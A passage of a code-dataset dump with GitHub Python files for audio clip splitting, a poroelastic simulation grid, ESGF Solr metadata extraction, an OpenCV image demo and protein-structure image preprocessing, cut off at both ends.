metadata[\"transcription\"] = transcriptions\n\n return (metadata, uid)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\n \"--dataset\",\n help=\"Folder contaning the audio/text files downloaded\",\n default=DATASET_FOLDER)\n args = parser.parse_args()\n\n # Guarantee that the output folders exist\n audio_path = os.path.join(args.dataset, \"raw\", \"audio\")\n os.makedirs(audio_path, exist_ok=True)\n os.makedirs(os.path.join(args.dataset, \"wav\"), exist_ok=True)\n # List of Dataframes\n dfs = []\n uid = 0\n # Source\n audio_source = glob.glob(audio_path + \"/*\")\n pbar = tqdm(audio_source, desc=\"Processing files...\")\n total = 0\n for audio_file in pbar:\n file_name = os.path.basename(audio_file)\n # Check if subtitle exists\n file_no_ext = file_name.split(\".\")[0]\n text_file = os.path.join(\n args.dataset, \"raw\", \"text\", file_no_ext + \".json\")\n if os.path.exists(text_file):\n df, uid = split_fragments(text_file, audio_file, args.dataset, uid)\n total += df.shape[0]\n pbar.set_description(\n f\"{file_name} added {df.shape[0]}/{total} fragments to dataset\")\n dfs.append(df)\n # Ignore audio without text\n else:\n pbar.set_description(f\"Ignoring {file_name}: no subtitles found.\")\n continue\n dataset = pd.concat(dfs).reset_index()\n dataset.to_csv(os.path.join(\n args.dataset, os.path.basename(os.path.normpath(args.dataset)) + \".csv\"),\n encoding='utf8')\n","repo_name":"Fernandohf/GenocidalVoice","sub_path":"processing/create_clips.py","file_name":"create_clips.py","file_ext":"py","file_size_in_byte":3932,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"18291562013","text":"import numpy as np\nfrom parameterSet import *\n\nclass uniformGrid:\n def __init__(self):\n self.parameter = parameter()\n self.M = self.parameter.M\n self.T = self.parameter.T\n self.dr = (self.parameter.r_s-self.parameter.r_v)/(self.M+1)\n self.dt = self.parameter.dt\n self.r_grid = np.linspace(self.parameter.r_v, self.parameter.r_s, self.M+1)\n self.t_grid = np.arange(0, self.T, self.dt)\n self.u0 = None\n self.p0 = None\n self.u_dummy_coefficient_1 = 2*self.parameter.G*(1-self.parameter.nu)/self.parameter.rho/(1-2*self.parameter.nu)\n self.u_dummy_coefficient_2 = self.parameter.alpha/self.parameter.rho\n\n self.u_dot_coefficient = self.parameter.d**4*np.pi/128/self.parameter.mu/self.parameter.L\n def IC(self, impact = True):\n \n if impact:\n # self.impactFunction = impactFunction()\n k = np.floor(self.M/3.5)\n amp = 0.004\n self.u_dot = amp*np.sin(100*self.r_grid*np.pi)\n \n self.u_dot[:int((self.M-np.floor(k/2)))] = 0\n else:\n self.u_dot = np.zeros(self.M+1)\n # print(len(self.u_dot))\n\n\n def central_diff(self, array, diff_order, dx): # interior points only, i.e. for len(array) = N we only use array[2:] - array[:-2]\n if diff_order == 1:\n return (array[2::]-array[0:-2])/(2*dx)\n elif diff_order == 2:\n return (array[2::]-2*array[1:-1]+array[0:-2])/(dx**2)\n\n def update_u(self): # advance u by one time step\n self.u1 = self.u_dot*self.dt+self.u0 \n self.u1[-1] = 0\n \n\n def update_u_dummy(self): # only the interior points matter here, so u0 rather than u1 is used\n self.u_dummy = np.zeros(self.M+1)\n self.u_dummy[1:-1] = self.u_dummy_coefficient_1\\\n *(self.central_diff(self.u0*self.r_grid, 2, self.dr)/self.r_grid[1:-1]\\\n -(2/(self.r_grid[1:-1]**2))*self.u0[1:-1])\\\n -self.u_dummy_coefficient_2*self.central_diff(self.p0, 1, self.dr)\n \n self.u_dummy[0] = self.u_dummy_coefficient_1\\\n *(np.sum(np.array([-2, 5, -4, 1])*self.r_grid[0:4]*self.u0[0:4])/(-1*self.dr**2)/self.r_grid[0]\\\n -2/(self.r_grid[0]**2)*self.u0[0])\\\n -self.u_dummy_coefficient_2*(-3*self.p0[0]+4*self.p0[1]-self.p0[2])/2/self.dr\n \n self.u_dummy[-1] = 0\n \n \n def update_p(self):\n \n p1 = np.zeros(self.M+1)\n p1[1:-1] = self.p0[1:-1]+\\\n self.dt/(self.parameter.S)*\\\n (-1*self.parameter.alpha*(self.central_diff(self.u_dot*self.r_grid**2, 1, self.dr)/self.r_grid[1:-1])\\\n +self.parameter.k*(self.central_diff(self.p0*self.r_grid, 2, self.dr)/self.r_grid[1:-1])\\\n +self.parameter.k*self.parameter.rho*(self.central_diff(self.u_dummy*(self.r_grid)**2, 1, self.dr)/self.r_grid[1:-1]**2))\n \n p1[0] = 2*self.parameter.G/(1-2*self.parameter.nu)/(self.parameter.alpha-1)*\\\n ((1-self.parameter.nu)*(-3*self.u1[0]+4*self.u1[1]-self.u1[2])/2/self.dr+2*self.parameter.nu/self.r_grid[0]*self.u1[0])\n \n p1[-1] = self.parameter.p_v+self.parameter.mu*self.parameter.R*self.parameter.Q_obs\n self.p1 = p1\n \n def update_u_dot(self):\n \n u_dot_1 = np.zeros(self.M+1)\n u_dot_1[1:-1] = self.u_dot[1:-1]+\\\n self.dt*(self.u_dummy_coefficient_1\\\n *(self.central_diff(self.u1*self.r_grid, 2, self.dr)/self.r_grid[1:-1]-2/(self.r_grid[1:-1]**2)*self.u1[1:-1])\\\n -self.u_dummy_coefficient_2*self.central_diff(self.p1, 1, self.dr)\n )\n u_dot_1[0] = 1/4/(np.pi*(self.r_grid[0]+self.u1[0])**2)\\\n *((self.parameter.Q_prod-(self.u_dot_coefficient)*(self.p1[0]-self.p1[-1])\\\n +4*self.parameter.k*np.pi*(self.r_grid[0]+self.u1[0])**2\\\n *(-3*self.p1[0]+4*self.p1[1]-self.p1[2])/2/self.dr))\n \n u_dot_1[-1] = 0\n self.u_dot_1 = u_dot_1\n\n ","repo_name":"putintostyle/poroelastic-model","sub_path":"uniformGrid.py","file_name":"uniformGrid.py","file_ext":"py","file_size_in_byte":4145,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"17593848466","text":"# encoding: utf-8\n\"\"\"\n.. _esgf_solr:\n\nESGF Solr\n---------\n\"\"\"\n__author__ = \"Richard Smith\"\n__date__ = \"27 May 2021\"\n__copyright__ = \"Copyright 2018 United Kingdom Research and Innovation\"\n__license__ = \"BSD - see LICENSE file in top-level package directory\"\n__contact__ = \"richard.d.smith@stfc.ac.uk\"\n\n\nimport logging\nimport os\n\n# Python imports\nfrom functools import lru_cache\n\nimport requests\n\nfrom stac_generator.core.decorators import (\n accepts_output_key,\n accepts_postprocessors,\n accepts_preprocessors,\n expected_terms_postprocessors,\n)\nfrom stac_generator.core.processor import BaseExtractionMethod\n\nLOGGER = logging.getLogger(__name__)\n\n\nclass ESGFSolrExtract(BaseExtractionMethod):\n \"\"\"\n Extracts metadata from files held in ESGF Solr.\n\n Configuration options:\n\n .. 
list-table::\n :header-rows: 1\n\n * - Option\n - Value Type\n - Description\n * - ```solr_kwargs```\n - ```dict```\n - Parameters to pass into the request URL to the Solr index\n \"\"\"\n\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n session_kwargs = getattr(self, \"solr_kwargs\")\n self.index = session_kwargs.get(\"index_node\")\n self.core = session_kwargs.get(\"solr_core\", \"files\")\n\n @staticmethod\n def format_item(solr_item):\n \"\"\"\n Solr returns metadata as lists, convert the single item\n list to item.\n \"\"\"\n if isinstance(solr_item, list) and len(solr_item) == 1:\n return solr_item[0]\n return solr_item\n\n def get_metadata(self, path, index, core):\n \"\"\"\n Send a request to Solr to get metadata from path id.\n \"\"\"\n url = f\"http://{index}/solr/{core}/select\"\n search_params = {\n \"indent\": \"on\",\n \"q\": f\"id:{path}\",\n \"wt\": \"json\",\n \"rows\": 1,\n \"sort\": \"id asc\",\n \"cursorMark\": \"*\",\n }\n\n resp = requests.get(url, search_params).json()\n docs = resp[\"response\"][\"docs\"][0]\n metadata = dict((k, self.format_item(v)) for k, v in docs.items())\n return metadata\n\n def extract_timestamp(self, metadata: dict):\n self.info[\"file_last_modified_timestamp\"] = metadata.pop(\"timestamp\")\n\n def extract_size(self, metadata: dict):\n self.info[\"size\"] = metadata.pop(\"size\")\n\n def extract_checksum(self, metadata: dict):\n self.info[\"checksum\"] = metadata.pop(\"checksum\")\n self.info[\"checksum_type\"] = metadata.pop(\"checksum_type\")\n\n def extract_filename(self, metadata: dict):\n filename = metadata.pop(\"title\")\n self.info[\"filename\"] = filename\n self.info[\"extension\"] = os.path.splitext(filename)[1]\n\n def extract_properties(self, metadata: dict):\n file_id = metadata.pop(\"id\")\n self.info[\"properties\"] = metadata\n self.info[\"properties\"][\"file_id\"] = file_id\n\n def extract_url(self, metadata: dict):\n urls = metadata.pop(\"url\")\n self.info[\"location\"] = urls\n hrefs = {method: url for (url, _, method) in [link.split(\"|\") for link in urls]}\n\n self.info[\"href\"] = hrefs.pop(\"HTTPServer\")\n for method, url in hrefs.items():\n self.info[f\"{method}_url\"] = url\n\n def extract_ids(self, metadata: dict):\n self.info[\"master_id\"] = metadata.pop(\"master_id\")\n self.info[\"instance_id\"] = metadata.pop(\"instance_id\")\n self.info[\"tracking_id\"] = metadata.pop(\"tracking_id\")\n\n @staticmethod\n def remove_fields(metadata: dict):\n \"\"\"\n Remove metadata that are not mapped to STAC\n \"\"\"\n keys = [\"type\", \"version\", \"_timestamp\", \"score\", \"_version_\"]\n for key in keys:\n try:\n metadata.pop(key)\n except KeyError:\n pass\n\n @lru_cache(maxsize=3)\n def get_item_metadata(self, dataset_id) -> dict:\n \"\"\"\n Get additional metadata exclusive to the dataset level of the file.\n \"\"\"\n metadata = self.get_metadata(dataset_id, self.index, \"datasets\")\n return metadata\n\n def get_item_info(self):\n \"\"\"\n Get item information.\n \"\"\"\n dataset_id = self.info[\"properties\"][\"dataset_id\"]\n item_metadata = self.get_item_metadata(dataset_id)\n\n dataset_exclusive_keys = [\n \"access\",\n \"height_units\",\n \"height_top\",\n \"height_bottom\",\n \"instance_id\",\n \"master_id\",\n \"url\",\n ]\n\n for key in dataset_exclusive_keys:\n try:\n self.info[\"properties\"][key] = item_metadata[key]\n except KeyError:\n pass\n\n # If there is geometry data, extract and reformat into bbox\n try:\n bbox = dict(\n min_lat=item_metadata[\"south_degrees\"],\n 
min_lon=item_metadata[\"west_degrees\"], # west -> min_lon, east -> max_lon (the original had the longitude bounds swapped)\n max_lat=item_metadata[\"north_degrees\"],\n max_lon=item_metadata[\"east_degrees\"],\n )\n self.info[\"properties\"].update(bbox)\n except KeyError:\n pass\n\n @accepts_output_key\n @accepts_preprocessors\n @accepts_postprocessors\n def run(self, uri: str, **kwargs) -> dict:\n\n # Transform the path back to ID form\n uri = uri.replace(\"/\", \".\")\n\n LOGGER.info(\"Extracting metadata for: %s\", uri)\n\n metadata = self.get_metadata(uri, self.index, self.core)\n\n self.extract_url(metadata)\n self.extract_size(metadata)\n self.extract_filename(metadata)\n self.extract_checksum(metadata)\n self.extract_ids(metadata)\n\n self.remove_fields(metadata)\n self.extract_properties(metadata)\n\n self.get_item_info()\n\n return self.info\n\n @expected_terms_postprocessors\n def expected_terms(self, **kwargs) -> list:\n \"\"\"\n The expected terms to be returned from running the extraction method with the given Collection Description\n :param collection_description: CollectionDescription for extraction method\n :param kwargs: free kwargs passed to the processor.\n :return: list\n \"\"\"\n\n return [\"esgf solr terms\"] # \"solr\", not \"solar\" -- matching the index being queried\n","repo_name":"cedadev/stac-generator","sub_path":"stac_generator/plugins/extraction_methods/esgf_solar.py","file_name":"esgf_solar.py","file_ext":"py","file_size_in_byte":6203,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"}
+{"seq_id":"16830636374","text":"import cv2\r\n\r\nimg_path = \"./mountain.jpeg\"\r\nimg = cv2.imread(img_path, cv2.IMREAD_GRAYSCALE)\r\ntitle = 'IMG'\r\n\r\nx, y = 100, 100\r\n\r\ncv2.namedWindow(title, cv2.WINDOW_NORMAL)\r\ncv2.moveWindow(title, x, y) # create the window before moving it\r\ncv2.imshow(title, img)\r\n\r\nwhile True:\r\n key = cv2.waitKey(0) & 0xFF\r\n if key == ord('s'):\r\n cv2.imwrite('output_gray.jpeg', img)\r\n if key == ord('r'):\r\n # cv2.imshow(title, cv2.resize(img, (img.shape[1]*2, img.shape[0]*2)))\r\n cv2.resizeWindow(title, 20,20)\r\n if key == ord('q'):\r\n break\r\n\r\ncv2.destroyAllWindows()","repo_name":"Ye0l/AI_Tello_Drone","sub_path":"cvImwrite.py","file_name":"cvImwrite.py","file_ext":"py","file_size_in_byte":555,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"70972646134","text":"import math\r\nimport os\r\nimport time\r\nimport numpy as np\r\nimport tensorflow as tf\r\nimport matplotlib.pyplot as plt\r\nimport pathlib\r\n#from scipy.stats import norm as nm\r\nfrom multiprocessing import Pool\r\nimport argparse\r\nimport matplotlib.image\r\n# from .arraylize import Arraylize\r\n\r\n\r\nparser = argparse.ArgumentParser(description='manual to this script')\r\nparser.add_argument('--resolution', type=int, default='256',\r\n help='output resolution')\r\nparser.add_argument('--dataset_path', type=str, default=os.getcwd(),\r\n help='path of dataset')\r\nparser.add_argument('--output_path', type=str, default=os.getcwd()+'/processed_data',\r\n help='path of output')\r\nparser.add_argument('--dataset', type=str, default='cif_filtered',\r\n help='name of dataset folder, bc-30-1_CA|bc-30-1_chains|cif_filtered')\r\nparser.add_argument('--input_type', type=str, default='cif',\r\n help='type of input file, cif|pdb')\r\nparser.add_argument('--output_type', type=str, default='image',\r\n help='image or distance_map, images|distance_map')\r\nparser.add_argument('--axis_range', type=int, default='64',\r\n help='map range of structures, 42|64')\r\nparser.add_argument('--multi_process', type=bool, default=True,\r\n help='multi 
process or not')\r\nparser.add_argument('--multi_atom', type=bool, default=False,\r\n help='input all backbone atoms or CA only')\r\nparser.add_argument('--move2center', type=bool, default=True,\r\n help='relocate the center of proteins to the center of coordinate system')\r\nparser.add_argument('--redistribute', type=bool, default=False,\r\n help='redistribute the original distribution according to normal distribution')\r\nparser.add_argument('--relative_number', type=bool, default=False,\r\n help='mark dots with relative serial number')\r\nparser.add_argument('--draw_connection', type=bool, default=True,\r\n help='draw dots connection or not')\r\nparser.add_argument('--aminoacid_message', type=bool, default=True,\r\n help='mark amino acid with hydropathicity, bulkiness and flexibility or 1.')\r\nparser.add_argument('--redistribute_rate', type=float, default='1.4',\r\n help='coefficient of redistribution amplitude')\r\nargs = parser.parse_args()\r\n\r\nres = args.resolution\r\nar = args.axis_range\r\ns = ar / res # scale=axis_range/resolution\r\ninput_folder = args.dataset_path + '/' + args.dataset\r\nAMINO_ACIDS = ['ALA', 'ARG', 'ASN', 'ASP', 'CYS',\r\n 'GLN', 'GLU', 'GLY', 'HIS', 'ILE',\r\n 'LEU', 'LYS', 'MET', 'PHE', 'PRO',\r\n 'SER', 'THR', 'TRP', 'TYR', 'VAL']\r\nAA_HYDROPATHICITY_INDEX = {\r\n 'ARG': -4.5,\r\n 'LYS': -3.9,\r\n 'ASN': -3.5,\r\n 'ASP': -3.5,\r\n 'GLN': -3.5,\r\n 'GLU': -3.5,\r\n 'HIS': -3.2,\r\n 'PRO': -1.6,\r\n 'TYR': -1.3,\r\n 'TRP': -0.9,\r\n 'SER': -0.8,\r\n 'THR': -0.7,\r\n 'GLY': -0.4,\r\n 'ALA': 1.8,\r\n 'MET': 1.9,\r\n 'CYS': 2.5,\r\n 'PHE': 2.8,\r\n 'LEU': 3.8,\r\n 'VAL': 4.2,\r\n 'ILE': 4.5,\r\n}\r\nAA_BULKINESS_INDEX = {\r\n 'ARG': 14.28,\r\n 'LYS': 15.71,\r\n 'ASN': 12.82,\r\n 'ASP': 11.68,\r\n 'GLN': 14.45,\r\n 'GLU': 13.57,\r\n 'HIS': 13.69,\r\n 'PRO': 17.43,\r\n 'TYR': 18.03,\r\n 'TRP': 21.67,\r\n 'SER': 9.47,\r\n 'THR': 15.77,\r\n 'GLY': 3.4,\r\n 'ALA': 11.5,\r\n 'MET': 16.25,\r\n 'CYS': 13.46,\r\n 'PHE': 19.8,\r\n 'LEU': 21.4,\r\n 'VAL': 21.57,\r\n 'ILE': 21.4,\r\n}\r\nAA_FLEXIBILITY_INDEX = {\r\n 'ARG': 2.6,\r\n 'LYS': 1.9,\r\n 'ASN': 14.,\r\n 'ASP': 12.,\r\n 'GLN': 4.8,\r\n 'GLU': 5.4,\r\n 'HIS': 4.,\r\n 'PRO': 0.05,\r\n 'TYR': 0.05,\r\n 'TRP': 0.05,\r\n 'SER': 19.,\r\n 'THR': 9.3,\r\n 'GLY': 23.,\r\n 'ALA': 14.,\r\n 'MET': 0.05,\r\n 'CYS': 0.05,\r\n 'PHE': 7.5,\r\n 'LEU': 5.1,\r\n 'VAL': 2.6,\r\n 'ILE': 1.6,\r\n}\r\nAMINO_ACID_NUMBERS = {}\r\nif args.aminoacid_message:\r\n for aa in AMINO_ACIDS:\r\n AMINO_ACID_NUMBERS.update({aa: [(5.5-AA_HYDROPATHICITY_INDEX[aa]) / 10 * 255.,\r\n AA_BULKINESS_INDEX[aa] / 21.67 * 255.,\r\n (25.-AA_FLEXIBILITY_INDEX[aa]) / 25. 
* 255.]})\r\nelse:\r\n for aa in AMINO_ACIDS:\r\n AMINO_ACID_NUMBERS.update({aa: [1.]})\r\nary_dim = 2 + len(AMINO_ACID_NUMBERS[AMINO_ACIDS[0]])\r\n\r\n\r\nclass Atom(object):\r\n def __init__(self, aminoacid, index, x, y, z, atom_type='CA', element='C'):\r\n self.index = int(index)\r\n self.aa = aminoacid\r\n self.x = float(x)\r\n self.y = float(y)\r\n self.z = float(z)\r\n self.type = atom_type\r\n self.element = element\r\n\r\n\r\ndef readfile(filename, path):\r\n # use a context manager so the file handle is always closed\r\n # (the original called file.close() after the return, which never executed)\r\n with open(path + '/' + filename, 'r') as file:\r\n if os.path.splitext(filename)[1] == '.cif' or os.path.splitext(filename)[1] == '.pdb':\r\n message = file.readlines()\r\n return message\r\n\r\n\r\ndef extract_cif(cif_message):\r\n atoms = []\r\n for line in cif_message:\r\n line = line.split()\r\n if line[3] in ['CA', 'C', 'N']:\r\n atoms.append(Atom(line[5], line[8], line[10],\r\n line[11], line[12], line[3], line[2]))\r\n return atoms\r\n\r\n\r\ndef extract_ca_cif(cif_message):\r\n atoms = []\r\n for line in cif_message:\r\n line = line.split()\r\n if line[3] == 'CA':\r\n atoms.append(Atom(line[5], line[8], line[10], line[11], line[12]))\r\n return atoms\r\n\r\n\r\ndef extract_pdb(pdb_message):\r\n atoms = []\r\n for line in pdb_message:\r\n if line[13:15] in ['N ', 'CA', 'C ']:\r\n atoms.append(Atom(line[17:20], line[13:16], line[30:38],\r\n line[38:46], line[46:54], line[13:16], line[77]))\r\n return atoms\r\n\r\n\r\ndef extract_ca_pdb(pdb_message):\r\n atoms = []\r\n for line in pdb_message:\r\n if line[13:15] == 'CA':\r\n atoms.append(Atom(line[17:20], line[13:16], line[30:38], line[38:46], line[46:54]))\r\n return atoms\r\n\r\n\r\ndef extract_message(message, message_type):\r\n if message_type == 'pdb':\r\n if args.multi_atom:\r\n return extract_pdb(message)\r\n else:\r\n return extract_ca_pdb(message)\r\n elif message_type == 'cif':\r\n if args.multi_atom:\r\n return extract_cif(message)\r\n else:\r\n return extract_ca_cif(message)\r\n\r\n\r\ndef find_head(atoms):\r\n for atom in atoms:\r\n if atom.type == 'CA':\r\n return atom\r\n\r\n\r\ndef find_tail(atoms):\r\n for i in range(1, len(atoms)+1):\r\n if atoms[-i].type == 'CA':\r\n return atoms[-i]\r\n\r\n\r\ndef rotation_axis(head):\r\n x = head.x\r\n y = head.y\r\n z = head.z\r\n c = ((y - x) ** 2 /\r\n ((y * res * (x ** 2 + y ** 2 + z ** 2 - 2 * s ** 2) ** 0.5 / ar - z) ** 2\r\n + (x * res * (x ** 2 + y ** 2 + z ** 2 - 2 * s ** 2) ** 0.5 / ar - z) ** 2\r\n + (y - x) ** 2)\r\n ) ** 0.5\r\n a = (y * res * (x ** 2 + y ** 2 + z ** 2 - 2 * s ** 2) ** 0.5 / ar - z) / (x - y) * c\r\n b = (x * res * (x ** 2 + y ** 2 + z ** 2 - 2 * s ** 2) ** 0.5 / ar - z) / (y - x) * c\r\n return [(a, b, c), (-a, -b, -c)] # the rotation axis (both orientations)\r\n\r\n\r\ndef rotation_angle(head):\r\n x = head.x\r\n y = head.y\r\n z = head.z\r\n return math.acos(\r\n ((x + y) * s + z * (x ** 2 + y ** 2 + z ** 2 - 2 * s ** 2) ** 0.5) /\r\n (x ** 2 + y ** 2 + z ** 2)\r\n ) # the rotation angle\r\n\r\n\r\ndef rotation(u, v, w, t, axis): # (u, v, w) are the original coordinates\r\n (a, b, c) = axis\r\n # Rodrigues' rotation formula:\r\n rx = u*math.cos(t)+(b*w-c*v)*math.sin(t)+a*(a*u+b*v+c*w)*(1-math.cos(t))\r\n ry = v*math.cos(t)+(c*u-a*w)*math.sin(t)+b*(a*u+b*v+c*w)*(1-math.cos(t))\r\n rz = w*math.cos(t)+(a*v-b*u)*math.sin(t)+c*(a*u+b*v+c*w)*(1-math.cos(t))\r\n return rx, ry, rz # the rotated coordinates\r\n
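\r\n# Editor's note (added example): quick self-check of rotation() above -- rotating\r\n# (1, 0, 0) by pi/2 about the z-axis (0, 0, 1) should give (0, 1, 0) up to\r\n# floating-point error.\r\ndef _check_rotation():\r\n rx, ry, rz = rotation(1.0, 0.0, 0.0, math.pi / 2, (0.0, 0.0, 1.0))\r\n assert abs(rx) < 1e-9 and abs(ry - 1.0) < 1e-9 and abs(rz) < 1e-9\r\n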
\r\n\r\ndef relocate(atoms):\r\n head = find_head(atoms)\r\n tail = find_tail(atoms)\r\n x_o = (head.x + tail.x) / 2\r\n y_o = (head.y + tail.y) / 2\r\n z_o = (head.z + tail.z) / 2\r\n # centre the chain on the head-tail midpoint, then rotate the head onto a fixed direction\r\n for atom in atoms:\r\n atom.x -= x_o\r\n atom.y -= y_o\r\n atom.z -= z_o\r\n vs = rotation_axis(head)\r\n t = rotation_angle(head)\r\n atom_v = []\r\n for v in vs:\r\n atom_v.append(rotation(head.x, head.y, head.z, t, v))\r\n # pick whichever axis orientation brings the head closest to the target (s, s)\r\n if abs(atom_v[0][0] - s) + abs(atom_v[0][1] - s) < abs(atom_v[1][0] - s) + abs(atom_v[1][1] - s):\r\n for atom in atoms:\r\n (atom.x, atom.y, atom.z) = rotation(atom.x, atom.y, atom.z, t, vs[0])\r\n else:\r\n for atom in atoms:\r\n (atom.x, atom.y, atom.z) = rotation(atom.x, atom.y, atom.z, t, vs[1])\r\n return atoms\r\n\r\n\r\ndef move2center(atoms):\r\n # uses TensorFlow 1.x APIs (Session, global_variables_initializer) to find the point\r\n # minimising the mean distance to all CA atoms by gradient descent\r\n coordinates = []\r\n for atom in atoms:\r\n if atom.type == 'CA':\r\n coordinates.append([atom.x, atom.y, atom.z])\r\n coordinates = np.array(coordinates)\r\n center = tf.Variable(tf.zeros([1, 3]))\r\n distances = coordinates-center\r\n loss = tf.reduce_mean(tf.sqrt(tf.reduce_sum(tf.square(distances), 1)))\r\n optimizer = tf.train.GradientDescentOptimizer(0.5)\r\n train = optimizer.minimize(loss)\r\n init = tf.global_variables_initializer()\r\n sess = tf.Session()\r\n sess.run(init)\r\n losses = []\r\n for step in range(10):\r\n sess.run(train)\r\n losses.append(sess.run(loss))\r\n while losses[-1] != losses[-5]:\r\n sess.run(train)\r\n losses.append(sess.run(loss))\r\n final_center = sess.run(center)[0]\r\n for atom in atoms:\r\n atom.x -= final_center[0]\r\n atom.y -= final_center[1]\r\n atom.z -= final_center[2]\r\n tf.reset_default_graph()\r\n return atoms\r\n\r\n\r\ndef sign(x):\r\n if x < 0:\r\n return -1\r\n else:\r\n return 1\r\n\r\n\r\ndef close_neibor(array, x_ary, y_ary, dot, dis_x, dis_y, rec):\r\n # search outward, ring by ring, for the nearest free lattice cell for 'dot'\r\n x_step = sign(dis_x)\r\n y_step = sign(dis_y)\r\n if abs(dis_x) < abs(dis_y):\r\n neibors = [(0, y_step), (x_step, 0), (x_step, y_step), (-x_step, 0),\r\n (0, -y_step), (-x_step, y_step), (x_step, -y_step), (-x_step, -y_step)]\r\n else:\r\n neibors = [(x_step, 0), (0, y_step), (x_step, y_step), (0, -y_step),\r\n (-x_step, 0), (x_step, -y_step), (-x_step, y_step), (-x_step, -y_step)]\r\n step = 1\r\n while True:\r\n for (i, j) in neibors:\r\n try:\r\n if array[x_ary + i * step, y_ary + j * step, 2] == 0:\r\n array[x_ary + i * step, y_ary + j * step] = [dot.z, dot.index] + AMINO_ACID_NUMBERS.get(dot.aa)\r\n rec.update({(x_ary + i * step, y_ary + j * step): dot})\r\n # print('dot%d:%d,%d->%d,%d'%(dot[6],x,y,x+i*step,y+j*step))\r\n return array\r\n except IndexError:\r\n print('dot(%d+%d,%d+%d) is out of the edge' % (x_ary, i * step, y_ary, j * step))\r\n # print('%d step neibor of dot%d(%d,%d) is full!'%(step,dot_i,x,y))\r\n step += 1\r\n\r\n\r\ndef lattice_battle(array, x_ary, y_ary, dot1, dot2, rec): # dot1 is the original occupant; dot2 is the newcomer\r\n # each dot's offset from the centre of its lattice cell decides who keeps the cell\r\n dis1_x = dot1.x / (2 * s) % 1 - 0.5\r\n dis1_y = dot1.y / (2 * s) % 1 - 0.5\r\n dis2_x = dot2.x / (2 * s) % 1 - 0.5\r\n dis2_y = dot2.y / (2 * s) % 1 - 0.5\r\n if dis1_x ** 2 + dis1_y ** 2 > dis2_x ** 2 + dis2_y ** 2:\r\n # print('%d / %d swap!'%(dot1[6],dot2[6]))\r\n array = close_neibor(array, x_ary, y_ary, dot1, dis1_x, dis1_y, rec)\r\n array[x_ary, y_ary] = [dot2.z, dot2.index] + AMINO_ACID_NUMBERS[dot2.aa]\r\n rec.update({(x_ary, y_ary) : dot2})\r\n else:\r\n array = close_neibor(array, x_ary, y_ary, dot2, dis2_x, dis2_y, rec)\r\n return array\r\n\r\n\r\ndef draw_atom(x, y, dot, array, rec):\r\n if array[x, y, -1] == 0:\r\n array[x, y] = [dot.z, dot.index] + AMINO_ACID_NUMBERS[dot.aa]\r\n rec.update({(x, y): dot})\r\n\r\n\r\ndef arraylize(atoms, array_dim):\r\n array = np.zeros([res, res, array_dim], dtype=float, order='C')\r\n rec = {} # atoms record\r\n for atom in atoms:\r\n x_ary = int((atom.x + ar) // (2 * s))\r\n y_ary = int((atom.y + ar) // (2 * s))\r\n if rec.get((x_ary, 
y_ary)):\r\n array = lattice_battle(array, x_ary, y_ary, rec[(x_ary, y_ary)], atom, rec)\r\n else:\r\n draw_atom(x_ary, y_ary, atom, array, rec)\r\n return array, rec\r\n\r\n\r\n# def values_sta(path):\r\n# xs = []\r\n# ys = []\r\n# for filename in os.listdir(path):\r\n# atoms = move2center(relocate(extract_cif(readfile(filename, path))))\r\n# for atom in atoms:\r\n# xs.append(atom.x)\r\n# ys.append(atom.y)\r\n# return xs, ys\r\n\r\n\r\ndef normal_dis(values, var, coefficient):\r\n dis = []\r\n values.sort()\r\n mark = 0\r\n idx = 0\r\n for i in range(res):\r\n cut_point = nm.ppf((i + 1) / res, 0, var**0.5 * coefficient)\r\n if idx == len(values):\r\n dis.append([])\r\n mark = int(idx)\r\n else:\r\n while values[idx] < cut_point:\r\n idx += 1\r\n if idx == len(values):\r\n dis.append(values[mark:idx])\r\n mark = int(idx)\r\n break\r\n else:\r\n dis.append(values[mark:idx])\r\n mark = int(idx)\r\n return dis\r\n\r\n\r\n# def redistribute():\r\n\r\n\r\ndef visual_values_dis(values):\r\n mark = 0\r\n idx = 0\r\n dis = []\r\n dis_count = []\r\n axis_length = 2*ar\r\n for i in range(1, res+1):\r\n cut_point = (i-res/2)*axis_length/res\r\n if idx == len(values):\r\n dis.append([])\r\n else:\r\n while values[idx] < cut_point:\r\n idx += 1\r\n if idx == len(values):\r\n dis.append(values[mark:idx])\r\n break\r\n else:\r\n dis.append(values[mark:idx])\r\n mark = int(idx)\r\n for i in range(res):\r\n dis_count.append(len(dis[i]))\r\n plt.bar(range(res), dis_count)\r\n plt.show()\r\n\r\n\r\ndef vis_normal_dis(values, var, coefficient):\r\n dis = []\r\n values.sort()\r\n mark = 0\r\n idx = 0\r\n dis_count = []\r\n for i in range(res):\r\n cut_point = nm.ppf((i+1)/res, 0, var**0.5*coefficient)\r\n if idx == len(values):\r\n dis.append([])\r\n mark = int(idx)\r\n else:\r\n while values[idx] < cut_point:\r\n idx += 1\r\n if idx == len(values):\r\n dis.append(values[mark:idx])\r\n mark = int(idx)\r\n break\r\n else:\r\n dis.append(values[mark:idx])\r\n mark = int(idx)\r\n dis_count.append(len(dis[i]))\r\n plt.bar(range(res), dis_count)\r\n plt.show()\r\n\r\n\r\ndef draw_dot(x, y, dot1, z_add, idx_add, array):\r\n if array[x, y, 2] == 0:\r\n array[x, y] = [dot1.z + z_add, dot1.index + idx_add, 0, 0, 0]\r\n\r\n\r\ndef dots_connection(dot1, dot2, array, site):\r\n x = site[dot1][0]\r\n y = site[dot1][1]\r\n z_s = dot2.z - dot1.z\r\n x_r = sign(site[dot2][0] - x)\r\n y_r = sign(site[dot2][1] - y)\r\n x_s = abs(site[dot2][0] - x)\r\n y_s = abs(site[dot2][1] - y)\r\n dis_c = max(x_s, y_s)+1\r\n if x_s + y_s > 2:\r\n for i in range(max(x_s, y_s)):\r\n l = i + 1\r\n if min(x_s, y_s) <= 1:\r\n if x_s > y_s:\r\n draw_dot(x + l*x_r, y, dot1, z_s*l/dis_c, l/dis_c, array)\r\n else:\r\n draw_dot(x, y + l*y_r, dot1, z_s*l/dis_c, l/dis_c, array)\r\n else:\r\n t = max(x_s, y_s) // min(x_s, y_s)\r\n remainder = max(x_s, y_s) % min(x_s, y_s)\r\n if x_s > y_s:\r\n j = [l, 